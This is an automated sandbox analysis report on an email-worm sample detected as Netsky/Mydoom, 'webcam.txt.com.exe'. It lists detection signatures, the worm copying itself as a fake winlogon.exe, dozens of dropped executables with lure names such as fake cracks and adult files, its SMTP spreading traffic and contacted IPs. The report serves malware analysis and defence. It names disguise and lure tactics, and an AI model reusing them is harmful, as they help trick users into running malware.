Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
webcam.txt.com.exe

Overview

General Information

Sample name:webcam.txt.com.exe
Analysis ID:1353116
MD5:0e17dbec1904b7c10614bfb29ef758fd
SHA1:b19765f00d764e9feae654c9223d124b1a874361
SHA256:b9b8e6d43ce8770733b490d6b98c61f84ae5d5d9e170ada6f034128d0ba9085f
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Creates files with lurking names (e.g. Crack.exe)
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Send many emails (e-Mail Spam)
Tries to resolve many domain names, but no domain seems valid
Abnormal high CPU Usage
Connects to many different domains
Contains functionality to dynamically determine API calls
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • webcam.txt.com.exe (PID: 6288 cmdline: C:\Users\user\Desktop\webcam.txt.com.exe MD5: 0E17DBEC1904B7C10614BFB29EF758FD)
  • winlogon.exe (PID: 2004 cmdline: "C:\Windows\winlogon.exe" -stealth MD5: 0E17DBEC1904B7C10614BFB29EF758FD)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.4172.253.115.2749738252810644 12/04/23-12:57:10.044750
SID:2810644
Source Port:49738
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4172.253.115.2749739252810641 12/04/23-12:57:10.143329
SID:2810641
Source Port:49739
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.485.187.148.249748252810645 12/04/23-12:59:08.468348
SID:2810645
Source Port:49748
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4142.251.16.2749758252810641 12/04/23-12:59:56.847271
SID:2810641
Source Port:49758
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4142.251.16.2749767252810645 12/04/23-13:00:15.447869
SID:2810645
Source Port:49767
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4172.253.115.2749736252810646 12/04/23-12:57:10.151702
SID:2810646
Source Port:49736
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4142.251.16.2749759252806859 12/04/23-12:59:56.770680
SID:2806859
Source Port:49759
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4185.183.28.23549744252810641 12/04/23-12:58:05.193819
SID:2810641
Source Port:49744
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4142.251.167.2649763252810643 12/04/23-13:00:06.727890
SID:2810643
Source Port:49763
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.4142.251.16.2749768252810644 12/04/23-13:00:15.434600
SID:2810644
Source Port:49768
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.467.195.204.7349729252810646 12/04/23-12:56:39.672732
SID:2810646
Source Port:49729
Destination Port:25
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: webcam.txt.com.exeAvira: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exeAvira: detection malicious, Label: WORM/Netsky.C
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Best Matrix Screensaver.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Clone DVD 5.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Cracks & Warez Archive.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dark Angels.pifReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Dictionary English - France.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\DivX 7.0 final.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Doom 3 Beta.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\E-Book Archive.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Full album.mp3.pifReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Gimp 1.5 Full with Key.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\How to hack.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\IE58.1 full setup.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Keygen 4 all appz.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Learn Programming.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Lightwave SE Update.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MS Service Pack 5.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Magix Video Deluxe 4.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Microsoft Office 2003 Crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Microsoft WinXP Crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Norton Antivirus 2004.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Adobe Photoshop 9 full.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Adobe Premiere 9.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Best Matrix Screensaver.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Microsoft WinXP Crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Porno Screensaver.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Office Setup Controller\Teen Porn 16.jpg.pifReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Opera.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Partitionsmagic 9.0.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Porno Screensaver.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\RFC Basics Full Edition.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Screensaver.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Serials.txt.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Smashing the stack.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Star Office 8.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Teen Porn 16.jpg.pifReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\The Sims 3 crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ulead Keygen.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Virii Sourcecode.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Visual Studio Net Crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Win Longhorn Beta.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\WinAmp 12 full.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\WinXP eBook.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Windows Sourcecode.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\XXX hardcore pic.jpg.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Ahead Nero 7.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Doom 3 Beta.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\E-Book Archive.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\How to hack.doc.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\Virii Sourcecode.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\IE58.1 full setup.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Lightwave SE Update.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Smashing the stack.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\The Sims 3 crack.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Ulead Keygen.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\1000 Sex and more.rtf.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\3D Studio Max 3dsmax.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\ACDSee 9.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Adobe Photoshop 9 full.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Adobe Premiere 9.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Ahead Nero 7.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Best Matrix Screensaver.scrReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Clone DVD 5.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Cracks & Warez Archive.exeReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Dark Angels.pifReversingLabs: Detection: 94%
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Dictionary English - France.doc.exeReversingLabs: Detection: 94%
Source: webcam.txt.com.exeReversingLabs: Detection: 94%
Source: webcam.txt.com.exeVirustotal: Detection: 93%Perma Link
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Ulead Keygen.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Cracks & Warez Archive.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Opera.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Photoshop 9 full.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Visual Studio Net Crack.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\1000 Sex and more.rtf.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\The Sims 3 crack.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\DivX 7.0 final.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Adobe Premiere 9.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\IE58.1 full setup.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Smashing the stack.rtf.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\ACDSee 9.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\Lightwave SE Update.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\3D Studio Max 3dsmax.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\WinAmp 12 full.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\Ahead Nero 7.exeJoe Sandbox ML: detected
Source: webcam.txt.com.exeJoe Sandbox ML: detected

Compliance

barindex
Source: C:\Users\user\Desktop\webcam.txt.com.exeUnpacked PE file: 0.2.webcam.txt.com.exe.400000.0.unpack
Source: C:\Windows\winlogon.exeUnpacked PE file: 1.2.winlogon.exe.400000.0.unpack
Source: webcam.txt.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00402CEA FindFirstFileA,CharLowerBuffA,FindNextFileA,FindClose,0_2_00402CEA
Source: C:\Windows\winlogon.exeCode function: 1_2_00402CEA FindFirstFileA,FindNextFileA,1_2_00402CEA

Networking

barindex
Source: TrafficSnort IDS: 2810646 ETPRO TROJAN Worm.Mydoom spreading via SMTP 30 192.168.2.4:49729 -> 67.195.204.73:25
Source: TrafficSnort IDS: 2810644 ETPRO TROJAN Worm.Mydoom spreading via SMTP 28 192.168.2.4:49738 -> 172.253.115.27:25
Source: TrafficSnort IDS: 2810641 ETPRO TROJAN Worm.Mydoom spreading via SMTP 25 192.168.2.4:49739 -> 172.253.115.27:25
Source: TrafficSnort IDS: 2810646 ETPRO TROJAN Worm.Mydoom spreading via SMTP 30 192.168.2.4:49736 -> 172.253.115.27:25
Source: TrafficSnort IDS: 2810641 ETPRO TROJAN Worm.Mydoom spreading via SMTP 25 192.168.2.4:49744 -> 185.183.28.235:25
Source: TrafficSnort IDS: 2810645 ETPRO TROJAN Worm.Mydoom spreading via SMTP 29 192.168.2.4:49748 -> 85.187.148.2:25
Source: TrafficSnort IDS: 2806859 ETPRO TROJAN Worm.Win32/Netsky.P@mm spreading via SMTP 1 192.168.2.4:49759 -> 142.251.16.27:25
Source: TrafficSnort IDS: 2810641 ETPRO TROJAN Worm.Mydoom spreading via SMTP 25 192.168.2.4:49758 -> 142.251.16.27:25
Source: TrafficSnort IDS: 2810643 ETPRO TROJAN Worm.Mydoom spreading via SMTP 27 192.168.2.4:49763 -> 142.251.167.26:25
Source: TrafficSnort IDS: 2810644 ETPRO TROJAN Worm.Mydoom spreading via SMTP 28 192.168.2.4:49768 -> 142.251.16.27:25
Source: TrafficSnort IDS: 2810645 ETPRO TROJAN Worm.Mydoom spreading via SMTP 29 192.168.2.4:49767 -> 142.251.16.27:25
Source: unknownDNS traffic detected: query: 4x.png replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 4.0.0 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 3x.png replaycode: Name error (3)
Source: unknownDNS traffic detected: query: bryson.demon.co.uk replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 18.2.0 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 3.4.2 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.5.22 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.8.29 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 0.23.0 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 3.1.74 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 1.1.49-custom.16 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.5.12 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 4.2.1 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2.4.2 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2x.png replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 1.10.295 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.6.28 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 1.0.5 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.2.42 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: src.dec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 0.11.10 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: mx2-lw-eu.apache.org replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.110.4 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.2.11 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 7.22.5 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.13.17 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 8.9.15 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2.2.11 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2.5.3 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 7.2.9 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2.6.33 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: z replaycode: Not Implemented (4)
Source: unknownDNS traffic detected: query: 2.0.12 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 15.7.2 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 3.3.2 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 9.0.6 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2.2.15 replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 2.2.0 replaycode: Name error (3)
Source: unknownNetwork traffic detected: DNS query count 74
Source: Joe Sandbox ViewIP Address: 173.228.157.41 173.228.157.41
Source: Joe Sandbox ViewIP Address: 209.51.188.92 209.51.188.92
Source: global trafficTCP traffic: 192.168.2.4:49729 -> 67.195.204.73:25
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 173.228.157.41:25
Source: global trafficTCP traffic: 192.168.2.4:49743 -> 51.81.61.70:25
Source: global trafficTCP traffic: 192.168.2.4:49744 -> 185.183.28.235:25
Source: global trafficTCP traffic: 192.168.2.4:49746 -> 131.111.8.146:25
Source: global trafficTCP traffic: 192.168.2.4:49747 -> 64.29.151.236:25
Source: global trafficTCP traffic: 192.168.2.4:49748 -> 85.187.148.2:25
Source: global trafficTCP traffic: 192.168.2.4:49749 -> 104.47.66.10:25
Source: global trafficTCP traffic: 192.168.2.4:49750 -> 209.51.188.92:25
Source: global trafficTCP traffic: 192.168.2.4:49752 -> 142.251.167.26:25
Source: global trafficTCP traffic: 192.168.2.4:49753 -> 142.251.16.27:25
Source: global trafficTCP traffic: 192.168.2.4:49756 -> 52.101.73.10:25
Source: global trafficTCP traffic: 192.168.2.4:49765 -> 162.255.118.51:25
Source: global trafficTCP traffic: 192.168.2.4:49769 -> 66.196.36.12:25
Source: global trafficTCP traffic: 192.168.2.4:49771 -> 17.57.154.33:25
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\webcam.txt.com.exeCode function: 0_2_00401D9B setsockopt,send,recv,0_2_00401D9B
Source: unknownDNS traffic detected: queries for: yahoo.com
